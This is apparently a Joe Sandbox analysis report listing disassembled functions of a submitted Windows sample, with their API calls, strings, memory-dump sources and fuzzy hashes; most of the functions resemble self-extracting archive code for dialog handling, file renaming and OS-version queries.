Function 00DD3E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: affef25eed2a7489ecf2e0f245c312e56d74eaeb60246fa7dec3fdc4717ac92f
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: 6031E7B1A1474A8FCB18DF28C85166EBBE0FF95304F54462EE495D7341C735EA0ACBA2

Function 00DCE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00DCE30E

Part of subcall function 00DC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DC40A5

Part of subcall function 00DD1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00E01030,00000200,00DCD928,00000000,?,00000050,00E01030), ref: 00DD1DC4

_strlen.LIBCMT ref: 00DCE32F
SetDlgItemTextW.USER32(?,00DFE274,?), ref: 00DCE38F
GetWindowRect.USER32(?,?), ref: 00DCE3C9
GetClientRect.USER32(?,?), ref: 00DCE3D5
GetWindowLongW.USER32(?,000000F0), ref: 00DCE475
GetWindowRect.USER32(?,?), ref: 00DCE4A2
SetWindowTextW.USER32(?,?), ref: 00DCE4DB
GetSystemMetrics.USER32(00000008), ref: 00DCE4E3
GetWindow.USER32(?,00000005), ref: 00DCE4EE
GetWindowRect.USER32(00000000,?), ref: 00DCE51B
GetWindow.USER32(00000000,00000002), ref: 00DCE58D

Strings

CAPTION, xrefs: 00DCE4BD
$%s:, xrefs: 00DCE302
d, xrefs: 00DCE3F5

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 13ddde25249f204bd1bce15c257b791b2bfb63729bb0f916c4cfa7ea51aa8f0b
Instruction ID: 8277ef375de24d86ba5036aa04d6bfcc4d95014dbf0878d23e21c7fbb3520f25
Opcode Fuzzy Hash: 13ddde25249f204bd1bce15c257b791b2bfb63729bb0f916c4cfa7ea51aa8f0b
Instruction Fuzzy Hash: 0C8193B1108341AFD710DF69CD89F6FBBE9EB88704F04491DFA84E7250D634E9098B62

Function 00DECB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00DECB66

Part of subcall function 00DEC701: _free.LIBCMT ref: 00DEC71E
Part of subcall function 00DEC701: _free.LIBCMT ref: 00DEC730
Part of subcall function 00DEC701: _free.LIBCMT ref: 00DEC742
Part of subcall function 00DEC701: _free.LIBCMT ref: 00DEC754
Part of subcall function 00DEC701: _free.LIBCMT ref: 00DEC766
Part of subcall function 00DEC701: _free.LIBCMT ref: 00DEC778
Part of subcall function 00DEC701: _free.LIBCMT ref: 00DEC78A
Part of subcall function 00DEC701: _free.LIBCMT ref: 00DEC79C
Part of subcall function 00DEC701: _free.LIBCMT ref: 00DEC7AE
Part of subcall function 00DEC701: _free.LIBCMT ref: 00DEC7C0
Part of subcall function 00DEC701: _free.LIBCMT ref: 00DEC7D2
Part of subcall function 00DEC701: _free.LIBCMT ref: 00DEC7E4
Part of subcall function 00DEC701: _free.LIBCMT ref: 00DEC7F6

_free.LIBCMT ref: 00DECB5B

Part of subcall function 00DE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00DEC896,?,00000000,?,00000000,?,00DEC8BD,?,00000007,?,?,00DECCBA,?), ref: 00DE8DE2
Part of subcall function 00DE8DCC: GetLastError.KERNEL32(?,?,00DEC896,?,00000000,?,00000000,?,00DEC8BD,?,00000007,?,?,00DECCBA,?,?), ref: 00DE8DF4

_free.LIBCMT ref: 00DECB7D
_free.LIBCMT ref: 00DECB92
_free.LIBCMT ref: 00DECB9D
_free.LIBCMT ref: 00DECBBF
_free.LIBCMT ref: 00DECBD2
_free.LIBCMT ref: 00DECBE0
_free.LIBCMT ref: 00DECBEB
_free.LIBCMT ref: 00DECC23
_free.LIBCMT ref: 00DECC2A
_free.LIBCMT ref: 00DECC47
_free.LIBCMT ref: 00DECC5F

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 186993456e8699e2220f6fbe967558fbcf1c411627281e9ff532db245cceab2a
Instruction ID: 183a0ea32fc89e8b06278ef8f7d8314e14155ae3f7104f547ffd123a4692d81b
Opcode Fuzzy Hash: 186993456e8699e2220f6fbe967558fbcf1c411627281e9ff532db245cceab2a
Instruction Fuzzy Hash: 04313B316106859FEB21BA3ADC46B5A77E9EF10310F286429F55CDB192DF31AC41DB30

Function 00DD9711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DD9736
_wcslen.LIBCMT ref: 00DD97D6
GlobalAlloc.KERNEL32(00000040,?), ref: 00DD97E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00DD9806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DD982D

Strings

</html>, xrefs: 00DD97B7
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00DD9760
<html>, xrefs: 00DD9755, 00DD978E
utf-8"></head>, xrefs: 00DD976B

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-4209811716
Opcode ID: d0d5a9663952bb47bd5ea364c457ea433e65bb6ec11efeec9f51d218514bccac
Instruction ID: 0b0a762aa84b02d7c9b8824af504ccb3695094a98927bbd96e2b57c3f3fb4cf1
Opcode Fuzzy Hash: d0d5a9663952bb47bd5ea364c457ea433e65bb6ec11efeec9f51d218514bccac
Instruction Fuzzy Hash: A53135321083417EE725BB31AC06FABB798EF42720F14411EF501A72C2EB659A0983B6

Function 00DDD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00DDD6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 00DDD6ED

Part of subcall function 00DD1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00DCC116,00000000,.exe,?,?,00000800,?,?,?,00DD8E3C), ref: 00DD1FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 00DDD709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00DDD720
GetObjectW.GDI32(00000000,00000018,?), ref: 00DDD734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00DDD75D
DeleteObject.GDI32(00000000), ref: 00DDD764
GetWindow.USER32(00000000,00000002), ref: 00DDD76D

Strings

STATIC, xrefs: 00DDD6F3

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: c8968dac4f099ce2887d7b9ca4e4588f6eda0e5cd6da91731adc068db5d07041
Instruction ID: 9fa8754f5004ba3f290e5ce41588a2d80820dd3d13e436cae22fb223290de674
Opcode Fuzzy Hash: c8968dac4f099ce2887d7b9ca4e4588f6eda0e5cd6da91731adc068db5d07041
Instruction Fuzzy Hash: 751156326403107FEA306B74AC4AFAF765DEF00701F048122FA02B22D1DB68CF0A4AB5

Function 00DE96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00DE9705

Part of subcall function 00DE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00DEC896,?,00000000,?,00000000,?,00DEC8BD,?,00000007,?,?,00DECCBA,?), ref: 00DE8DE2
Part of subcall function 00DE8DCC: GetLastError.KERNEL32(?,?,00DEC896,?,00000000,?,00000000,?,00DEC8BD,?,00000007,?,?,00DECCBA,?,?), ref: 00DE8DF4

_free.LIBCMT ref: 00DE9711
_free.LIBCMT ref: 00DE971C
_free.LIBCMT ref: 00DE9727
_free.LIBCMT ref: 00DE9732
_free.LIBCMT ref: 00DE973D
_free.LIBCMT ref: 00DE9748
_free.LIBCMT ref: 00DE9753
_free.LIBCMT ref: 00DE975E
_free.LIBCMT ref: 00DE976C

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d35d42c82b051bad0fe5a5c8a62f359ddaada5b113d0c6a9f8f11870d0584d68
Instruction ID: c3ae8d4ce95d37d5bfa9e5c953336dfe698a360d88ad8ecf828ccac673b9e88d
Opcode Fuzzy Hash: d35d42c82b051bad0fe5a5c8a62f359ddaada5b113d0c6a9f8f11870d0584d68
Instruction Fuzzy Hash: CC11A476110149AFCB01FF56CC42CD93BB5EF14350B5554A1FA088F262DE32DA50ABA4

Function 00DE2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00DE2F50
___TypeMatch.LIBVCRUNTIME ref: 00DE305E
_UnwindNestedFrames.LIBCMT ref: 00DE31B0
CallUnexpected.LIBVCRUNTIME ref: 00DE31CB
_abort.LIBCMT ref: 00DE31D0

Strings

csm, xrefs: 00DE2F87
csm, xrefs: 00DE2EDB
csm, xrefs: 00DE2E6E

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: e46cfb35f3a36254d9c19990a01f00d5f125eb95b995273f1b662bffd1eb8702
Instruction ID: 54997c8f58fb12ce068a1fd381e9bd205013bcb74b38515a124fbfa9063ef403
Opcode Fuzzy Hash: e46cfb35f3a36254d9c19990a01f00d5f125eb95b995273f1b662bffd1eb8702
Instruction Fuzzy Hash: 93B14B71800289EFCF25EFA6C8859BEBBB9FF14310F184559E8156B212D731EA51CBB1

Function 00DC6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC6FAA
_wcslen.LIBCMT ref: 00DC7013
_wcslen.LIBCMT ref: 00DC7084

Part of subcall function 00DC7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00DC7AAB
Part of subcall function 00DC7A9C: GetLastError.KERNEL32 ref: 00DC7AF1
Part of subcall function 00DC7A9C: CloseHandle.KERNEL32(?), ref: 00DC7B00

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00DC6FCC
\??\, xrefs: 00DC702B
SeRestorePrivilege, xrefs: 00DC6FC2
UNC\, xrefs: 00DC7051

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 746207cc08f96127047123d770684261b26c8756e87d958d6e23a630fdbf34e2
Instruction ID: 2eb13b5fc9fa0bb5f47c121373bc302e72c43f1d2126a8b1c897dad426ceefb6
Opcode Fuzzy Hash: 746207cc08f96127047123d770684261b26c8756e87d958d6e23a630fdbf34e2
Instruction Fuzzy Hash: 6E412BB1D0838A7AEB20EB749C42FEE776CDF14344F08445DFA55A7182D674AA888B31

Function 00DDB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC1316: GetDlgItem.USER32(00000000,00003021), ref: 00DC135A
Part of subcall function 00DC1316: SetWindowTextW.USER32(00000000,00DF35F4), ref: 00DC1370

EndDialog.USER32(?,00000001), ref: 00DDB610
SendMessageW.USER32(?,00000080,00000001,?), ref: 00DDB637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00DDB650
SetWindowTextW.USER32(?,?), ref: 00DDB661
GetDlgItem.USER32(?,00000065), ref: 00DDB66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00DDB67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00DDB694

Strings

LICENSEDLG, xrefs: 00DDB5D4

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 40fb1d3c6335ce5ed4f01cf2cb18f3bc62934efbe8dd1a19982292c83bd398c5
Instruction ID: 06b291ec8596384f5b367306be44980a31465e21d6950c7d333bc833cf24f0ae
Opcode Fuzzy Hash: 40fb1d3c6335ce5ed4f01cf2cb18f3bc62934efbe8dd1a19982292c83bd398c5
Instruction Fuzzy Hash: F1212931200204FFD2215F77EC49F7B3B6DFB46B54F064016F641BA2A0CB56D9069A75

Function 00DDFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,A0690113,00000001,00000000,00000000,?,?,00DCAF6C,ROOT\CIMV2), ref: 00DDFD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00DCAF6C,ROOT\CIMV2), ref: 00DDFE14
SysAllocString.OLEAUT32(00000000), ref: 00DDFE1F
_com_issue_error.COMSUPP ref: 00DDFE48
_com_issue_error.COMSUPP ref: 00DDFE52
GetLastError.KERNEL32(80070057,A0690113,00000001,00000000,00000000,?,?,00DCAF6C,ROOT\CIMV2), ref: 00DDFE57
_com_issue_error.COMSUPP ref: 00DDFE6A
GetLastError.KERNEL32(00000000,?,?,00DCAF6C,ROOT\CIMV2), ref: 00DDFE80
_com_issue_error.COMSUPP ref: 00DDFE93

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 83ec9563a4265ad24f9d0f4467acf89f67f378d10d7e95a9c92806f6fa04599e
Instruction ID: dd38ead7ab57025c7abcbd6b2c6d4bb4049b38e40f22f1744f3bf86131b735d0
Opcode Fuzzy Hash: 83ec9563a4265ad24f9d0f4467acf89f67f378d10d7e95a9c92806f6fa04599e
Instruction Fuzzy Hash: EC41E771A00319ABCB109F69DC45BAEBBA8EF44710F14823BF916E7351D7349900C7B5

Function 00DCAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DCAF29

Strings

SELECT * FROM Win32_OperatingSystem, xrefs: 00DCAFCA
ROOT\CIMV2, xrefs: 00DCAF5C
Name, xrefs: 00DCB0B0
WQL, xrefs: 00DCAFDC
Windows 10, xrefs: 00DCB0C2

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: 175d1ea8df8077a49ca83e7c833901c95d9baa1cb5a1dcaa47af5a8fd6fd7ed5
Instruction ID: 04cabc14b07b11ebf30bdf7be0545c5b15cdf8116f2beec2af1eb8aa21f2b234
Opcode Fuzzy Hash: 175d1ea8df8077a49ca83e7c833901c95d9baa1cb5a1dcaa47af5a8fd6fd7ed5
Instruction Fuzzy Hash: A3713A70A0061AAFDB14DFA8D895EBEBBB9FF49714B15415DF512A72A0CB30AD01CB70

Function 00DC9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC9387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00DC93AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00DC93C9

Part of subcall function 00DCC29A: _wcslen.LIBCMT ref: 00DCC2A2

Part of subcall function 00DD1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00DCC116,00000000,.exe,?,?,00000800,?,?,?,00DD8E3C), ref: 00DD1FD1

_swprintf.LIBCMT ref: 00DC9465

Part of subcall function 00DC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DC40A5

MoveFileW.KERNEL32(?,?), ref: 00DC94D4
MoveFileW.KERNEL32(?,?), ref: 00DC9514

Strings

rtmp%d, xrefs: 00DC944E

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 1f11c07eead683e2d5a7ec673a49a3ab79af04257d208bff85af0efe8c7960f2
Instruction ID: 35fd2f782e012ba127c223a2b5414a6cf195520d39fcaf3ee572ed03addc87f3
Opcode Fuzzy Hash: 1f11c07eead683e2d5a7ec673a49a3ab79af04257d208bff85af0efe8c7960f2
Instruction Fuzzy Hash: A041567191025A66DF21AB60CC59FEEB37CEF45340F0488A9B649E3151DA389BC9CB74

Function 00DD1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00DD122E

Part of subcall function 00DCB146: GetVersionExW.KERNEL32(?), ref: 00DCB16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00DD1251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00DD1263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00DD1274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00DD1284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00DD1294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00DD12CF
__aullrem.LIBCMT ref: 00DD1379

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: bf80167625ed8ce4e0e715dec0918f0b57de29c546b29766678e67ef628003aa
Instruction ID: a47d894b5b96581cbb79e7a18f4cff4b5699b4050c2e645cd6fc291334e95696
Opcode Fuzzy Hash: bf80167625ed8ce4e0e715dec0918f0b57de29c546b29766678e67ef628003aa
Instruction Fuzzy Hash: E74104B6508305AFC710DF65C88496BBBF9FF88714F04892EF596C2210E738E649CB62

Function 00DC2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00DC2536

Part of subcall function 00DC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DC40A5

